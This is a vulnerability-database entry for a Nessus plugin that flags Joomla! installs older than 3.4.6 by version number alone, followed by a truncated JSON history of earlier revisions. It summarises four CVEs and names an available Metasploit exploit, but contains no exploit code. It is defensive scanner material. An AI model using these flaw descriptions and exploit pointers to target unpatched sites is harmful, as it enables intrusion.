ID JOOMLA_346.NASL Type nessus Reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-12-02T00:00:00
Description
According to its self-reported version number, the Joomla!
installation running on the remote web server is prior to 3.4.6. It
is, therefore, affected by multiple vulnerabilities :
A remote code execution vulnerability exists due to
improper sanitization of session values. An
unauthenticated, remote attacker can exploit this to
execute arbitrary code. (CVE-2015-8562)
A cross-site request forgery (XSRF) vulnerability exists
due to HTTP requests to com_templates not requiring
multiple steps, explicit confirmation, or a unique token
when performing certain sensitive actions. An
unauthenticated, remote attacker can exploit this, by
convincing a user to follow a specially crafted link, to
cause the user to perform unspecified actions.
(CVE-2015-8563)
A path traversal vulnerability exists due to improper
sanitization of user-supplied input via the XML install
file. (CVE-2015-8564)
A path traversal vulnerability exists due to improper
sanitization of input supplied via user requests.
(CVE-2015-8565)
Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration branch: the scanner runs this with `description` set to
# collect plugin metadata only. Nothing below touches the network; the
# branch ends with exit(0) so the detection logic further down is skipped.
if (description)
{
script_id(87416);
script_version("1.14");
script_cvs_date("Date: 2019/11/20");
# Four CVEs fixed in Joomla! 3.4.6 (RCE, XSRF, two path traversals); the
# BID and EDB-ID cross-references below map to the same advisory set.
script_cve_id(
"CVE-2015-8562",
"CVE-2015-8563",
"CVE-2015-8564",
"CVE-2015-8565"
);
script_bugtraq_id(
79195,
79199,
79201,
79203
);
script_xref(name:"EDB-ID", value:"38977");
script_xref(name:"EDB-ID", value:"39033");
script_name(english:"Joomla! < 3.4.6 Multiple Vulnerabilities");
script_summary(english:"Checks the version of Joomla!.");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities.");
script_set_attribute(attribute:"description", value:
"According to its self-reported version number, the Joomla!
installation running on the remote web server is prior to 3.4.6. It
is, therefore, affected by multiple vulnerabilities :
- A remote code execution vulnerability exists due to
improper sanitization of session values. An
unauthenticated, remote attacker can exploit this to
execute arbitrary code. (CVE-2015-8562)
- A cross-site request forgery (XSRF) vulnerability exists
due to HTTP requests to com_templates not requiring
multiple steps, explicit confirmation, or a unique token
when performing certain sensitive actions. An
unauthenticated, remote attacker can exploit this, by
convincing a user to follow a specially crafted link, to
cause the user to perform unspecified actions.
(CVE-2015-8563)
- A path traversal vulnerability exists due to improper
sanitization of user-supplied input via the XML install
file. (CVE-2015-8564)
- A path traversal vulnerability exists due to improper
sanitization of input supplied via user requests.
(CVE-2015-8565)
Note that Nessus has not tested for these issues but has instead
relied only on the application's self-reported version number.");
# https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b06a8fbc");
script_set_attribute(attribute:"solution", value:
"Upgrade to Joomla! version 3.4.6 or later.");
# Severity metadata: CVSSv2 and CVSSv3 base/temporal vectors; the
# cvss_score_source attribute names the CVE the vectors were taken from.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:X");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-8565");
# Public exploit availability flags (Metasploit and CANVAS modules exist),
# used by the scanner to prioritise the finding.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
script_set_attribute(attribute:"vuln_publication_date", value:"2015/12/14");
script_set_attribute(attribute:"patch_publication_date", value:"2015/12/14");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/12/16");
# The check is version-only (no probe of the flaws themselves), so the
# finding is marked potential and, at runtime, is only reported when the
# Settings/ParanoidReport key (required below) enables paranoid mode.
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Runs after the Joomla! detection plugin; needs a detected install, PHP
# on the web server, and the paranoia setting, plus a www service (port 80
# by default).
script_dependencies("joomla_detect.nasl");
script_require_keys("installed_sw/Joomla!", "www/PHP", "Settings/ParanoidReport");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);

# Version-only check: only report when the scan policy opts into
# paranoid findings.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

version     = install['version'];
install_loc = build_url(port:port, qs:install['path']);
fix         = "3.4.6";

# Keep only the leading digits-and-dots part of the reported version;
# anything after the first non-digit is discarded.
ver_match = eregmatch(string:version, pattern:"^([0-9\.]+)($|[^0-9])");
if (empty_or_null(ver_match))
  audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);
numeric = ver_match[1];

# A bare "3.4" cannot be placed on either side of the 3.4.6 fix.
# NOTE(review): a single-component value such as "3" would pass this
# check and compare below the fix — confirm the detection plugin never
# reports one.
if (numeric == "3.4")
  audit(AUDIT_VER_NOT_GRANULAR, app, version);

# Affected range: 1.5.0 (inclusive) up to, but not including, the fix.
below_floor     = ver_compare(ver:numeric, fix:"1.5.0", strict:FALSE) < 0;
at_or_above_fix = ver_compare(ver:numeric, fix:fix, strict:FALSE) >= 0;
if (below_floor || at_or_above_fix)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);

# Vulnerable: build the ordered report and flag the XSRF component too.
fields = make_list("URL", "Installed version", "Fixed version");
items  = make_array(
  fields[0], install_loc,
  fields[1], version,
  fields[2], fix
);
security_report_v4(
  port:port,
  extra:report_items_str(report_items:items, ordered_fields:fields),
  severity:SECURITY_HOLE,
  xsrf:TRUE
);
exit(0);
{"id": "JOOMLA_346.NASL", "bulletinFamily": "scanner", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "published": "2015-12-16T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/87416", "reporter": "This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?b06a8fbc"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "type": "nessus", "lastseen": "2019-12-13T07:51:53", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:joomla:joomla\\!"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. 
(CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "edition": 14, "enchantments": {"dependencies": {"modified": "2019-11-22T02:48:10", "references": [{"idList": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "type": "cve"}, {"idList": ["SAINT:150A052478728FE6FC97F9B52382B525", "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", "SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A"], "type": "saint"}, {"idList": ["1337DAY-ID-24758", "1337DAY-ID-24763"], "type": "zdt"}, {"idList": ["A9F60CE8-A4E0-11E5-B864-14DAE9D210B8"], "type": "freebsd"}, {"idList": ["JOOMLA-634", "JOOMLA-630", "JOOMLA-633", "JOOMLA-635"], "type": "joomla"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE"], "type": "metasploit"}, {"idList": ["OPENVAS:1361412562310105486", "OPENVAS:1361412562310105487"], "type": "openvas"}, {"idList": ["JOOMLA_347.NASL", "FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "JOOMLA_OBJECT_INJECTION.NASL"], "type": "nessus"}, {"idList": ["IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"], "type": "impervablog"}, {"idList": ["EDB-ID:39033", "EDB-ID:38977"], "type": "exploitdb"}, {"idList": ["JOOMLA_SESSION_UNSERIALIZE"], "type": "canvas"}, {"idList": ["THREATPOST:9475C86517671FDF8D35E7E89FB91463"], "type": "threatpost"}, {"idList": ["PACKETSTORM:135100", "PACKETSTORM:134949"], "type": "packetstorm"}]}, "score": {"modified": "2019-11-22T02:48:10", "value": 7.4, "vector": "NONE"}}, "hash": "3f5219b200bdc0cf769fdea63a35f3f992bb567449d4d34835bc77687d42f0c0", "hashmap": [{"hash": "a67b72711b557eaa1cb901087a882768", "key": "description"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "9c95562c2b2059addaa39c0c8952b1ea", "key": "sourceData"}, {"hash": 
"f0c058e0d7789cc02544fb074c2ebeb8", "key": "href"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "f82feb6b55f329a4801a7908bc18a9d6", "key": "reporter"}, {"hash": "6d1c534dc9bfdb4206c06293dcccafda", "key": "cpe"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/87416", "id": "JOOMLA_346.NASL", "lastseen": "2019-11-22T02:48:10", "modified": "2019-11-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n \"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! 
< 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! 
version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8565\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "title": "Joomla! 
< 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 27}, "differentElements": ["modified"], "edition": 14, "lastseen": "2019-11-22T02:48:10"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "According to its self-reported version number, the Joomla! application running on the remote web server is prior to 3.4.6. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to improper sanitization of session values. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery vulnerability exists due to HTTP requests to com_templates not requiring multiple steps, explicit confirmation, or a unique token when performing certain sensitive actions. An unauthenticated, remote attacker can exploit this by convincing a user to follow a specially crafted link, to cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper sanitization of user-supplied input via the XML install file. 
(CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "edition": 1, "hash": "ff349ff8f1961e4d6d8b7df358f8622ac936768a593d29ac11c525e05af4f05e", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3bbb9f1695f78e751a165135d1e6933f", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "948d610586ec8a1d610de65c4645d11f", "key": "modified"}, {"hash": "aa3a806712ec38fbb401419c984cd5ce", "key": "description"}, {"hash": "fe431d002c3234b19fc0c7c4c23ca999", "key": "published"}, {"hash": "6f971b8a5752c9a4a44306db39282683", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e7b4b8d462ef6ff4a4efa192ec0c3507", "key": "title"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "a552e9b06370d4c94153c2d856b54c24", "key": "sourceData"}, {"hash": "871c430e5e5dff2841813e7218c22d5c", "key": "cvelist"}, {"hash": "da65470e1074a8a2b67a229e55366e45", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=87416", "id": "JOOMLA_346.NASL", "lastseen": "2016-09-26T17:24:24", "modified": "2016-06-16T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "87416", "published": "2015-12-16T00:00:00", "references": ["http://www.nessus.org/u?b06a8fbc"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87416);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/06/16 14:58:25 $\");\n\n script_cve_id(\n \"CVE-2015-8562\",\n 
\"CVE-2015-8563\",\n \"CVE-2015-8564\",\n \"CVE-2015-8565\"\n );\n script_bugtraq_id(\n 79195,\n 79199,\n 79201,\n 79203\n );\n script_osvdb_id(\n 131679,\n 131680,\n 131681,\n 131682\n );\n\n script_name(english:\"Joomla! < 3.4.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla! application\nrunning on the remote web server is prior to 3.4.6. It is, therefore,\naffected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2015-8562)\n\n - A cross-site request forgery vulnerability exists due to\n HTTP requests to com_templates not requiring multiple\n steps, explicit confirmation, or a unique token when\n performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b06a8fbc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! 
version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla%21\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"www/joomla\",\"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(\n appname : \"joomla\",\n port : port,\n exit_on_fail : TRUE\n);\n\ndir = 
install[\"dir\"];\ninstall_loc = build_url(port:port, qs:dir);\nversion = install[\"ver\"];\n\nif (version == UNKNOWN_VER)\n audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Joomla!\", install_loc);\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Joomla!\", install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, \"Joomla!\", version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:\"3.4.6\", strict:FALSE) < 0)\n{\n set_kb_item(name: 'www/'+port+'/XSRF', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_loc+\n '\\n Installed version : ' +version+\n '\\n Fixed version : 3.4.6' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Joomla!\", install_loc, version);\n", "title": "Joomla! < 3.4.6 Multiple Vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:24:24"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:joomla:joomla\\!"], "cvelist": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.6. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. 
(CVE-2015-8562)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to HTTP requests to com_templates not requiring\n multiple steps, explicit confirmation, or a unique token\n when performing certain sensitive actions. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a specially crafted link, to\n cause the user to perform unspecified actions.\n (CVE-2015-8563)\n\n - A path traversal vulnerability exists due to improper\n sanitization of user-supplied input via the XML install\n file. (CVE-2015-8564)\n\n - A path traversal vulnerability exists due to improper\n sanitization of input supplied via user requests.\n (CVE-2015-8565)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-10-28T20:32:08", "references": [{"idList": ["CVE-2015-8565", "CVE-2015-8564", "CVE-2015-8563", "CVE-2015-8562"], "type": "cve"}, {"idList": ["SAINT:150A052478728FE6FC97F9B52382B525", "SAINT:C6AA8FC60EF73B444D044C4F52877D2B", "SAINT:1E0BFF3A5AC9A780E289B143FCC5F23A"], "type": "saint"}, {"idList": ["1337DAY-ID-24758", "1337DAY-ID-24763"], "type": "zdt"}, {"idList": ["A9F60CE8-A4E0-11E5-B864-14DAE9D210B8"], "type": "freebsd"}, {"idList": ["JOOMLA-634", "JOOMLA-630", "JOOMLA-633", "JOOMLA-635"], "type": "joomla"}, {"idList": ["MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE"], "type": "metasploit"}, {"idList": ["OPENVAS:1361412562310105486", "OPENVAS:1361412562310105487"], "type": "openvas"}, {"idList": ["JOOMLA_347.NASL", "FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "JOOMLA_OBJECT_INJECTION.NASL"], "type": "nessus"}, {"idList": ["IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"], "type": "impervablog"}, {"idList": ["EDB-ID:39033", "EDB-ID:38977"], "type": "exploitdb"}, {"idList": ["JOOMLA_SESSION_UNSERIALIZE"], "type": "canvas"}, {"idList": ["THREATPOST:9475C86517671FDF8D35E7E89FB91463"], "type": "threatpost"}, 
